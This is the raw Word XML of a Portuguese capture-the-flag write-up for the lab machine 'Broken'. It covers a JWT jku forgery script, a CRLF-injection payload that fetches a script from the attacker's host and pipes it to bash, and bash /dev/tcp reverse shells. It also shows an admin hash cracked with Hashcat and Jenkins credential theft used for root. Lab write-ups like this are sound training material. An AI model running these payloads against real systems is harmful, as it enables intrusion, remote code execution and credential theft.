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heading=h.74yjvd5ng7ij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34x0vs6gikz3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 write-up é referente a máquina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Broken.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Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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canal de suporte no servidor do Discord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 SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7lig70nsy058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Reconhecimento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Iniciou-se o processo de enumeração com o objetivo de identificar os serviços expostos e as portas abertas no servidor alvo. Foi utilizada a ferramenta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Nmap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realizar a enumeração dos serviços e portas expostas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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nmap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--open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--min-rate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&lt;machine-ip&gt;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-vvv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416300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="107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Observou-se que o acesso ao serviço web resultou em um redirecionamento para o domínio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broken.hc.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permitir a resolução local de DNS durante os testes, o domínio foi inserido no arquivo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/etc/hosts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da máquina utilizada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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768711"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="109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711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acessar a aplicação web, verificou-se que o site exibia uma mensagem indicando que estava em manutenção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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813288"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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2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Iniciou-se a etapa de enumeração de subdomínios. Durante o processo de fuzzing de subdomínios, foram identificados dois subdomínios adicionais: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before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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api.broken.hc: correspondente a um endpoint de API;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lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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git.broken.hc: relacionado a um serviço de hospedagem Git (aparentemente baseado em Gitea)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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349500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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acessar a aplicação exposta no subdomínio da API, iniciou-se a análise inicial de seus endpoints e funcionalidades disponíveis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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Por meio da ferramenta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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf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foram identificados os endpoints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/.well-known/jwks.json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/v1/api-docs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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021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ffuf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http://api.broken.hc/FUZZ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-w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common.txt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-t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ffuf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http://api.broken.hc/FUZZ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-w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./Service-Specific/Swagger.txt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-t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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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803763"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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376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289300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="113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Nesse endpoint, foi possível obter a chave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jwks.json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utilizada para a validação dos JSON Web Tokens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(JWT)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http://api.broken.hc/.well-known/jwks.json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927100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="112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acessar esse endpoint, foi identificada uma interface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Swagger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exposta, a qual disponibiliza a documentação completa da API, incluindo todas as rotas e seus respectivos parâmetros.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API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disponibiliza endpoints para registro de usuários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(/register)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autenticação e obtenção de tokens JWT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(/login)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funcionalidades administrativas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(/admin).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”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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http://api.broken.hc/v1/api-docs/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251438"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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43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possível registrar um novo usuário por meio do endpoint disponibilizado pela API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after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http://api.broken.hc/register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'Content-Type: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application/json'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'{"username":"teste","password":"teste"}'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685800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="114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token JWT foi obtido com sucesso por meio do processo de autenticação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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http://api.broken.hc/login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'{"username":"teste","password":"teste"}'|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927100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="118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decodificar o token JWT utilizando a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId19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jwthunter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possível analisar seu conteúdo interno.</w:t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594100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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analisar os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header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s do token JWT, identificou-se a presença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parâmetro jku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apontando para uma URL em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localhost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O valor desse campo refere-se a um arquivo ou endpoint que disponibiliza um conjunto de chaves criptográficas públicas em formato JSON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(JWKS)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Esse mecanismo é utilizado para permitir que aplicações externas validem a assinatura de tokens JWT emitidos pelo servidor de autorização, sem a necessidade de acesso à chave privada.</w:t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295234"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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5234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Caso o parâmetro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jku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não seja devidamente validado pelo servidor, um atacante pode direcioná-lo para um endpoint externo de sua própria escolha. Isso permitiria o fornecimento de um conjunto de chaves maliciosas, possibilitando a geração de tokens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JWT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assinados de forma arbitrária e a consequente modificação dos dados contidos no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token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Para realizar essa etapa, foi gerado um conjunto próprio de chaves criptográficas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 fim de compor um JWKS malicioso para validação indevida do token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openssl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genrsa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private.pem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openssl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rsa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private.pem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-pubout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public.pem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787400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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jwt,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jwcrypto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jwk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PRIVATE_KEY_FILE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"private.pem"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PUBLIC_KEY_FILE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"public.pem"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JWKS_FILE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"jwks.json"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"evil"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JKU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"http://&lt;vpn-ip&gt;:8000/jwks.json"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attacker-controlled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open(PRIVATE_KEY_FILE,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"rb")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private_key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f.read()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open(PUBLIC_KEY_FILE,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"rb")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public_pem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f.read()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jwk.JWK.from_pem(public_pem)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jwk_dict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key.export(as_dict=True,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private_key=False)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jwk_dict["kid"]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jwks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{"keys":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[jwk_dict]}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open(JWKS_FILE,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"w")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json.dump(jwks,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indent=2)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print(f"[+]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JWKS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{JWKS_FILE}")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payload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"username":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"&lt;your-user&gt;",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"admin":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"alg":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"RS256",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"typ":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"JWT",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"kid":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"jku":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JKU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7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jwt.encode(payload,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private_key,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algorithm="RS256",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headers=headers)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print("[+]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token:\n")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print(token)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Dessa forma, foi possível gerar um t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oken JWT com permissões administrativas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358900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="120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781300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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Como já possuíamos um token com permissões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administrativas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possível acessar funcionalidades restritas da aplicação. Entre elas, destacou-se o acesso à rota administrativa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/admin/users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F">
      <w:pPr>
        <w:jc w:val="both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295400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="122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'GET'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'http://api.broken.hc/admin/users'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'Authorization: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Bearer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&lt;your-token&gt;'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374900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="123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Além disso, ao realizar uma requisição direta à API na rota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/admin/users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possível obter a hash de autenticação do usuário admin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A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$2b$10$YzpZJ7ul8qR4tPCEUWeg1eRYbvHHvwjOmWYl1pBGBgpa0JolfqHGe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a hash obtida, a senha do usuário foi quebrada utilizando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Hashcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E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3200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~/rockyou.txt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september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498600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="124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673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="125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senha obtida foi utilizada para realizar a autenticação direta na aplicação,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http://git.broken.hc/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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041888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="127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8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acessar essa aplicação, não foram identificadas informações. O único conteúdo disponível consistia em um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README.md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escrito em formato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Markdown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informando que o repositório havia sido removido do ambiente de produção. Adicionalmente, o arquivo fornecia a referência a um subdomínio adicional, denominado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check-development.broken.hc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indicando a existência de outro subdomínio para análise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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616200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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acessado o subdomínio</w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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http://check-development.broken.hc/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705100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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clicar no botão, o usuário foi redirecionado para a rota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/page/error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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679700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Nessa rota, foi possível visualizar mensagens de erro da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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485900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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realizar um processo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fuzzing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nessa rota, foi possível identificar a existência dos arquivos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index.php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check.php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acessíveis pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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ffuf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http://check-development.broken.hc/page/FUZZ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common.txt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-fl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003788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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37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Por meio da funcionalidade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view-source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possível visualizar o código-fonte dos arquivos da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="102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231900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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visualização do código dos arquivos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.php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da aplicação só foi possível devido ao uso da função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readfile,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identificada no arquivo,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index.php,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 qual permitia a leitura do conteúdo dos arquivos da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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check.php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não se encontrava disponível ou acessível por meio da aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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143000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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identificada uma característica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atípica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no servidor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Apache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onde parâmetros do tipo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?page=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não eram suportados, comportamento atribuído à configuração do módulo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mod_rewrite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do apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Módulo do Apache que permite modificar e redirecionar URLs automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="8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que serve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before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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Criar URLs amigáveis (ex: /produto/42 em vez de /produto.php?id=42)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before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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Redirecionar páginas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240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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Direcionar requisições para um único arquivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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384300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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identificada uma falha na configuração do servidor Apache, relacionada ao uso do módulo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mod_rewrite/proxy rewrite,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na qual os dados inseridos após o caminho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/page/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não passavam por validação ou sanitização adequada. Esse comportamento permitia a injeção de conteúdo adicional na requisição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HTTP,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inclusive elementos do próprio protocolo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4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Como consequência, tornou-se possível manipular o fluxo de processamento da aplicação e acionar, de forma indireta, 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check.php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mesmo este não estando acessível diretamente pela interface web. Esse cenário foi possível devido à injeção dos caracteres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\r e \n,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caracterizando um ataque do tipo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CRLF Injection.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Dessa forma, foi possível acionar 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check.php,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o qual continha a função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shell_exec,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responsável por executar comandos diretamente no sistema operacional. Com isso, foi possível executar comandos no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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HTTP/1.1\r\n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Host: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check-development.broken.hc\r\n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User-Agent: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curl/8.17.0\r\n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Connection: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keep-alive\r\n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\r\n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/check.php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HTTP/1.1\r\n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Host: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check-development.broken.hc\r\n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Content-Type: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application/x-www-form-urlencoded\r\n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Content-Length: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43\r\n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\r\n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domain=;&lt;your-command&gt;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--path-as-is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ttp://check-development.broken.hc/page/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AUser-Agent:%20curl%0D%0AConnection:%20keep-alive%0D%0A%0D%0APOST%20/check.php%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2043%0D%0A%0D%0Adomain=%3&lt;your-command&gt;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Dessa forma, foi possível executar o comando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curl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no sistema, validando a existência de um vulnerabilidade chamada command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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749300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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executar uma reverse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shell,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foi utilizado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curl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ler um arquivo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arbitrário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hospedado externamente e, em seguida, executar seu conteúdo no sistema, resultando no estabelecimento da conexão reversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF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#!/bin/bash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/bin/bash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/dev/tcp/&lt;your-vpn&gt;/443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0&gt;&amp;1'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901700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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--path-as-is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ttp://check-development.broken.hc/page/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AUser-Agent:%20curl%0D%0AConnection:%20keep-alive%0D%0A%0D%0APOST%20/check.php%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2043%0D%0A%0D%0Adomain=%3bcurl%20&lt;your-vpn&gt;/shell.sh%20%7c%20bash%3b%0D%0A%0D%0AGET%20/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0A%0D%0A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shell.sh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foi lido via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curl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executado pelo sistema, resultando na obtenção de uma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reverse shell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673100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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825500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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422400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Exploração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user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Após a obtenção da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reverse shell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realizado o ajuste para uma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shell TTY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permitindo uma interação mais estável e completa com o sistema, incluindo melhor controle de entrada/saída e execução de comandos interativos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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/dev/null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crt+z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-echo;fg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727200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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encontrado o arquivo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calculator.py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no diretório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/opt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578100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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aplicação aceita entradas do usuário sem validação adequada e as envia ao servidor para processamento. Esse comportamento possibilita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injeção de comandos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caracterizando uma vulnerabilidade chamada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Command Injection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expression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input("Enter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expression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evaluate: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s.sendall(expression.encode())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Por meio dessa falha, foi possível invocar a biblioteca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os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Python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e, consequentemente, utilizar chamadas ao sistema para executar comandos diretamente no sistema operacional. Com isso, foi possível acionar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reverse shell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estabelecendo uma conexão remota com o sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106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__import__('os').system('bash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/dev/tcp/&lt;machine-ip&gt;/443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0&gt;&amp;1"')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57200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Como resultado, foi estabelecida uma nova conexão reversa utilizando o usuário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leonardo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701800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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flag de usuário foi encontrada no diretório do usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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673100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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Escalação de privilégio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root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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identificado 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jenkins_token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no diretório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/etc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o qual correspondia a um token de autenticação do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Jenkins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Nesse arquivo, também foi identificado o usuário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ek1l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associado ao token do Jenkins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116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/etc/jenkins_token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175238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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23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identificado que o serviço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Jenkins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também estava em execução na máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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jenkins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19100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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token foi exportado para ser utilizado na autenticação no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Jenkins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export JENKINS_TOKEN=$(tail -n 1 /etc/jenkins_token)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126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curl -u ek1l:$JENKINS_TOKEN 'http://127.0.0.1:8080/api/json?tree=jobs%5Bname,url%5D'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127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81000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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o acesso ao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Jenkins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possível listar os jobs da aplicação, sendo identificado um job denominado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project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C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curl -u ek1l:$JENKINS_TOKEN "http://127.0.0.1:8080/job/project/api/json?pretty=true"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454400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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verificar o output do job project, foi identificada uma variável denominada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MY_VAR2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contendo o valor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ex3ZDK1I4Lxmm77wzp0wCic3Bno7hXu2iX4VeSeZj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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ek1l:$JENKINS_TOKEN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"http://127.0.0.1:8080/job/project/1/consoleText"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MY_VAR2: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ex3ZDK1I4Lxmm77wzp0wCic3Bno7hXu2iX4VeSeZj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832338"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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33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Essa senha foi utilizada para realizar login na aplicação com o usuário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914400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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flag de root foi localizada no diretório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/root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do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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jc w:val="both"/>
        <w:rPr/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558800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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59" w:type="default"/>
      <w:headerReference r:id="rId60" w:type="first"/>
      <w:headerReference r:id="rId61" w:type="even"/>
      <w:footerReference r:id="rId62" w:type="default"/>
      <w:footerReference r:id="rId63" w:type="first"/>
      <w:footerReference r:id="rId64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7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2025 Hacking Club | Todos os direitos reservados </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                          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1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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.z4bc3uhbvyv9" w:id="3"/>
    <w:bookmarkEnd w:id="3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-866770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128" name="image49.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image49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43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4">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image13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5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-942970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126" name="image47.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image47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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="79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Broken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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="79" name="image51.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image5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86550" cy="301567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2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3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0.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId45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1.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId4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app.hackingclub.com/laboratory/competition-machines/293" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://check-development.broken.hc/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://check-development.broken.hc/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId61" 